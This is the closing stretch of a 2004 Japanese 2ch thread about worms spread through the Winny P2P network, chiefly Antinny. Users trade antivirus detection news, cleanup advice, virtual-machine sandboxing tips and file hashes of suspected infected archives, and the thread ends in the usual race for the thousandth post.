951 :[名無し]さん(bin+cue).rar:04/04/16 13:55 ID:ov0K7uFQ
>>943
あとはhostsとレジストリのRunとかがだいじょぶならだいじょぶじゃねの?

952 :[名無し]さん(bin+cue).rar:04/04/16 17:26 ID:FlmZScrJ
WORM_ANTINNY.J !!
http://www.trendmicro.com/ftp/products/pattern/cpr/whatsnew.txt

Pattern: 858
Version: 22
Release Type: Control Release
Notes:

April 15, 2004 23:33:23 (GMT -08:00)

---------------------
New Virus Detected:
---------------------

There are [164] new viruses detected by the pattern file.
All detail virus names please refer to the list below.


BAT_DEBESKI.B
BKDR_ASPROOT.A
BKDR_ASSASIN.A

中略

WORM_AGOBOT.ZM
WORM_AGOBOT.ZW
WORM_AGOBOT.ZX
WORM_ANTINNY.J  ←
WORM_CETEC.A
WORM_CONE.F
WORM_CULT.D

953 :[名無し]さん(bin+cue).rar:04/04/16 17:32 ID:FlmZScrJ
追加。
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.J

954 :[名無し]さん(bin+cue).rar:04/04/16 18:09 ID:lt72hDLn
新作キタ━━━━━━(゚∀゚)━━━━━━ !!!!

955 :[名無し]さん(bin+cue).rar:04/04/16 18:11 ID:37XbURGp
>>954
新作はどこで落とせますか?ハッシュきぼん

956 :[名無し]さん(bin+cue).rar:04/04/16 19:59 ID:MYIxm95c
シマンテックは対応しないのかなあ

957 :[名無し]さん(bin+cue).rar:04/04/16 20:34 ID:bPGY22Gh
>>952
対応遅いyo!

NOD32定義ファイル: 1.716 (20040413)
IRC/SdBot.AEP, Win32/Antinny.J, Win32/IRCBot.DS, Win32/TrojanDownloader.Small.HG


958 :[名無し]さん(bin+cue).rar:04/04/16 22:23 ID:K5yOk0b8
>>945
ものすごい幼稚さを感じさせる書き込みだ

959 :[名無し]さん(bin+cue).rar:04/04/16 23:53 ID:MAFGG3a6
>>944
まったくだ。
DOSコマンドを読めれば誰でもわかる&作れる。

つべこべ言わず最新版の
[キンタマ] 俺のデスクトップ 受付端末 (創価学会) [04-04-08](ファイル詰め合わせ).zip 1,193,748 b11b0162e2ccc3374452e15a37e52ee0
あたりでも落としてろと。

960 :[名無し]さん(bin+cue).rar:04/04/17 04:25 ID:rqzUimwk
>>959
だから、キャリア自慢はその辺でいいから
身になる話を聞かせてよ。

961 :[名無し]さん(bin+cue).rar:04/04/17 06:02 ID:4oYKCHJM
誰かJ検出されたやついるか?

962 :[名無し]さん(bin+cue).rar:04/04/17 09:42 ID:GMLu2Ps4
トレンドマイクロでantinnyの別名をみると「キンタマウイルス」や「ぬるぽワーム」や「ヌルポース」って書いてるんだね。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=antinny&alt=antinny


963 :[名無し]さん(bin+cue).rar:04/04/17 11:26 ID:m313roTp
exe踏んじゃったんでupfolder.txtは削除したんですけど、
レジストリ開いても普通にレジストリが出るし、\tempにユーザー名.txtもありません。
今ウィルススキャンしてますが、これからどうすりゃいいんでしょうか

964 :[名無し]さん(bin+cue).rar:04/04/17 11:30 ID:rRvprvl2
>>963
>1から読みなおせ

965 :[名無し]さん(bin+cue).rar:04/04/17 12:20 ID:neMB3yoI
>>962
ワロタ

966 :[名無し]さん(bin+cue).rar:04/04/17 12:36 ID:KifyiQj0
>>962
強制猥褻罪

967 :[名無し]さん(bin+cue).rar:04/04/17 14:00 ID:wQdrRxlP
ウイルスプログラムここ一週間で二回も喰らった…
もうね…
今まで一度も喰らったこと無かったのに…

968 :[名無し]さん(bin+cue).rar:04/04/17 14:22 ID:y0LMTik4
>>967
(・∀・)コンニチワ!!

969 :[名無し]さん(bin+cue).rar:04/04/17 16:31 ID:FKytjkwD
>>960
だよね
>>932-933とかは勉強になるけど
>>944なんかただの糞レスだもん
誰の役にもたたない
要するにオレだってそのくらい判るからオレも誉めろって事でしょ
こっぱずかしい

970 :[名無し]さん(bin+cue).rar:04/04/17 16:59 ID:xh6BmANY
>>967
ナカーマ(*・∀・)人(・∀・*)
DELALL食らってセットアップ終わった次の日にまた違うウイルスでまっさらに
アンチウイルスとか入れてなかったし、それなりにリスクは承知でやってるから
どうってことはないけど。今までが奇跡的だったのか

971 :[名無し]さん(bin+cue).rar:04/04/17 17:07 ID:BYSKTyhj
エロゲやるときはdaemonにのせてウイルスチェックして
autorunの内容をチェックすれば大丈夫?
ファイル全消去コワヒ・・

972 :[名無し]さん(bin+cue).rar:04/04/17 17:08 ID:T5McQJXd
仮想PCを使う。

973 :[名無し]さん(bin+cue).rar:04/04/17 17:14 ID:BYSKTyhj
>>972
それがメンドクサインデ・・

974 :[名無し]さん(bin+cue).rar:04/04/17 17:15 ID:a7PtOLSv
>>970
VMwareとVirtualPCどっち使っッテル?

ところで次スレまだか、950。

975 :[名無し]さん(bin+cue).rar:04/04/17 17:17 ID:T5McQJXd
個人的にはVMWare

976 :[名無し]さん(bin+cue).rar:04/04/17 17:20 ID:7+t1jhdd
小説 十二国記外伝 漂舶 .lzh 2,736,179
2a39d33d6b61fe7a4f33b0154bc759de

これに入ってるの何?これさわった瞬間バスター落ちた

977 :[名無し]さん(bin+cue).rar:04/04/17 17:23 ID:rRvprvl2
【警報】Winnyを狙ったワーム・ウイルス情報 Part17
http://tmp2.2ch.net/test/read.cgi/download/1082190076/

978 :[名無し]さん(bin+cue).rar:04/04/17 17:43 ID:a7PtOLSv
>>975
トンクス。重くないか、VMって。UniX系OSだとイイ!(・∀・)と聞いたけど

979 :[名無し]さん(bin+cue).rar:04/04/17 17:45 ID:Vj+gUEe9
むこうにかいてしまった(;´Д`)

12国記の奴はメモリ常駐型のウイルス入ってる
奴じゃなかったっけ。
前にアニメスレあたりで出ていたような…。
ノードが違うから落ちてこない。

980 :[名無し]さん(bin+cue).rar:04/04/17 17:46 ID:T5McQJXd
>978
さあ?重いと思ったことはないけど。

981 :[名無し]さん(bin+cue).rar:04/04/17 17:46 ID:kOvdAoY2
俺のように何だかよくわからないがとりあえず仮想PC入れたいというヤシは
virtualPCで十分だな

982 :[名無し]さん(bin+cue).rar:04/04/17 18:05 ID:bRPV81M3
>>976>>979
検出ログ書き込んだんだけど、新スレに送信しちゃった。


983 :[名無し]さん(bin+cue).rar:04/04/17 18:15 ID:a7PtOLSv
いずれ総出で新スレ逝くからキニスンナ

984 :[名無し]さん(bin+cue).rar:04/04/17 20:03 ID:mj+UNrju
VMって重いのかぁ……今のところ感じたことがないけど。
比べる対象がないから重いも何もないし……。
試しにVPC使ってみようかな。

VPCに比べてエラーに遊びが少ないようなことは聞いたことがあるな。
実際、VMはハードの増設とかでちょっと躓くとホストOSもろとも落ちたりするんだよな。

985 :[名無し]さん(bin+cue).rar:04/04/17 20:27 ID:z9Xl1tsm
('A`)

986 :[名無し]さん(bin+cue).rar:04/04/18 00:48 ID:16KN5zRv
あひゃ

987 :[名無し]さん(bin+cue).rar:04/04/18 20:52 ID:aeEQwLkU
よしここらいでいいだろう
おもむろに1000ゲット

988 :[名無し]さん(bin+cue).rar:04/04/18 21:32 ID:zXWiQTl/
いやいや、1000ゲッターはおれだよ、おれ。

989 :[名無し]さん(bin+cue).rar:04/04/18 21:37 ID:ugBY9Q6g
いまだ。2Gto

990 :[名無し]さん(bin+cue).rar:04/04/18 21:43 ID:FlJviSUm
      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )

991 :[名無し]さん(bin+cue).rar:04/04/18 21:44 ID:tjnPuWk5
991

992 :[名無し]さん(bin+cue).rar:04/04/18 21:45 ID:CRovOHUk
992

993 :[名無し]さん(bin+cue).rar:04/04/18 21:45 ID:zXWiQTl/
ttp://v.isp.2ch.net/up/188fd391f1fe.swf

Spaceで撃てる。弾はEnterで手動装填。上下キーで前後に移動、左右キーで方向転換。
フィールドに落ちている弾を頑張って拾わないとわりとすぐ弾切れになる。

994 :1000:04/04/18 21:46 ID:yLf0n8eb
1000!!

995 :1000:04/04/18 21:47 ID:zXWiQTl/
ごめんね、1000げっとはじめてだから。ごめんね。

996 :[名無し]さん(bin+cue).rar:04/04/18 21:50 ID:rGJ7fS4f
997ぐらい

997 :[名無し]さん(bin+cue).rar:04/04/18 21:51 ID:rJw9w6jj
1000

998 :[名無し]さん(bin+cue).rar:04/04/18 21:51 ID:rGJ7fS4f
おまいら、狙いすぎで止まってますよ(・∀・)ニヤニヤ

999 :[名無し]さん(bin+cue).rar:04/04/18 21:51 ID:LAoEDLOs
パパスが死んじゃった〜!!。・゚・(ノД`)・゚・。

1000 :[名無し]さん(bin+cue).rar:04/04/18 21:51 ID:/3KbYZgP
ワームワリなスレだ

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

276 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)